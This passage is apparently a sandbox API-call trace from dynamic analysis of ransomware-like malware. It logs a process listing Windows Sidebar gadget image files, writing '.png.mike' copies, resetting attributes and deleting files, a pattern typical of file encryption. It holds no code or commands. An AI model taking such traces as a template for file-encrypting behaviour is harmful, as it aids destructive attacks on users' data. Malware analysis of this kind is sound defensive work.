lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.800] WriteFile (in: hFile=0x288, lpBuffer=0x2248e8c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2248e8c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.802] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png.mike", lpFilePart=0x0) returned 0x53 [0102.802] WriteFile (in: hFile=0x288, lpBuffer=0x224d650*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x224d650*, lpNumberOfBytesWritten=0x2af074*=0x150, lpOverlapped=0x0) returned 1 [0102.804] WriteFile (in: hFile=0x288, lpBuffer=0x225088c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x225088c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png", dwFileAttributes=0x80) returned 0 [0102.805] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-dock.png.mike")) returned 1 [0102.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6909d20, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6909d20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28135767, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x28135767, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-desk.png", cAlternateFileName="")) returned 1 [0102.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8232d98a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8232d98a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-dock.png", cAlternateFileName="")) returned 1 [0102.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8232d98a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8232d98a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-today.png", cAlternateFileName="")) returned 1 [0102.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8245e472, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8245e472, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28181a23, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-disable.png", cAlternateFileName="")) returned 1 [0102.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82353ae7, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82353ae7, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28181a23, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x19d, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-down.png", cAlternateFileName="")) returned 1 [0102.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82379c44, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82379c44, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x281a7b81, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-hot.png", cAlternateFileName="")) returned 1 [0102.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239fda1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8239fda1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x281a7b81, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext.png", cAlternateFileName="")) returned 1 [0102.808] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824845cf, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824845cf, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28219f9b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-disable.png", cAlternateFileName="")) returned 1 [0102.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239fda1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8239fda1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28219f9b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x199, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-down.png", cAlternateFileName="")) returned 1 [0102.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823c5efe, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x823c5efe, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28219f9b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x23e, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-hot.png", cAlternateFileName="")) returned 1 [0102.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823c5efe, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x823c5efe, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x282400f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev.png", cAlternateFileName="")) returned 1 [0102.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824845cf, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824845cf, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double.png", cAlternateFileName="")) returned 1 [0102.809] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824aa72c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824aa72c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double_bkg.png", cAlternateFileName="")) returned 1 [0102.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824d0889, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824d0889, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double_orange.png", cAlternateFileName="")) returned 1 [0102.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824d0889, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824d0889, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2828c3b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_ring_docked.png", cAlternateFileName="")) returned 1 [0102.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824f69e6, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824f69e6, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28396d47, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single.png", cAlternateFileName="")) returned 1 [0102.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8251cb43, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8251cb43, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28396d47, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_bkg.png", cAlternateFileName="")) returned 1 [0102.810] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8251cb43, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8251cb43, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28396d47, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x12a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_bkg_orange.png", cAlternateFileName="")) returned 1 [0102.811] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82542ca0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82542ca0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x283bcea5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xaa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_orange.png", cAlternateFileName="")) returned 1 [0102.811] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82542ca0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82542ca0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x283e3003, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="corner.png", cAlternateFileName="")) returned 1 [0102.811] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824121b8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824121b8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x283e3003, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="curl-hot.png", cAlternateFileName="")) returned 1 [0102.811] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82438315, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82438315, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28409161, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x380, dwReserved0=0x0, dwReserved1=0x0, cFileName="curl.png", cAlternateFileName="")) returned 1 [0102.811] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82438315, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82438315, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2842f2bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x96, dwReserved0=0x0, dwReserved1=0x0, cFileName="month.png", cAlternateFileName="")) returned 1 [0102.812] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82438315, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82438315, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2842f2bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-desk.png", cAlternateFileName="")) returned 1 [0102.812] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8245e472, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8245e472, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2847b57b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-dock.png", cAlternateFileName="")) returned 1 [0102.812] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8245e472, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8245e472, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2847b57b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-dock.png", cAlternateFileName="")) returned 0 [0102.812] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.812] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.812] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.813] CoTaskMemFree (pv=0x506980) [0102.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0102.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8439c2bc, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8439c2bc, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2855fdaf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0102.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.814] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285ac06b, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x285ac06b, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x285ac06b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2e0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0102.814] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805c807b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805c807b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0102.814] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843c2419, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x843c2419, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e73115, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0102.814] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.814] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.816] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0102.820] WriteFile (in: hFile=0x288, lpBuffer=0x225a9b4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x225a9b4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0102.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.mike", lpFilePart=0x0) returned 0x43 [0102.825] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.mike", lpFilePart=0x0) returned 0x43 [0102.826] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.mike", lpFilePart=0x0) returned 0x43 [0102.826] WriteFile (in: hFile=0x288, lpBuffer=0x227cdc8*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x227cdc8*, lpNumberOfBytesWritten=0x2af0bc*=0xb90, lpOverlapped=0x0) returned 1 [0102.827] WriteFile (in: hFile=0x288, lpBuffer=0x227ffd8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x227ffd8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0102.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0102.829] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\drag.png.mike")) returned 1 [0102.831] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0102.832] WriteFile (in: hFile=0x288, lpBuffer=0x2284d08*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2284d08*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0102.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.mike", lpFilePart=0x0) returned 0x43 [0102.836] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.mike", lpFilePart=0x0) returned 0x43 [0102.836] WriteFile (in: hFile=0x288, lpBuffer=0x2298084*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2298084*, lpNumberOfBytesWritten=0x2af0bc*=0x610, lpOverlapped=0x0) returned 1 [0102.838] WriteFile (in: hFile=0x288, lpBuffer=0x229b294*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x229b294*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0102.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0102.840] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\icon.png.mike")) returned 1 [0102.842] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0102.843] WriteFile (in: hFile=0x288, lpBuffer=0x229ffc4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x229ffc4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0102.846] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.mike", lpFilePart=0x0) returned 0x43 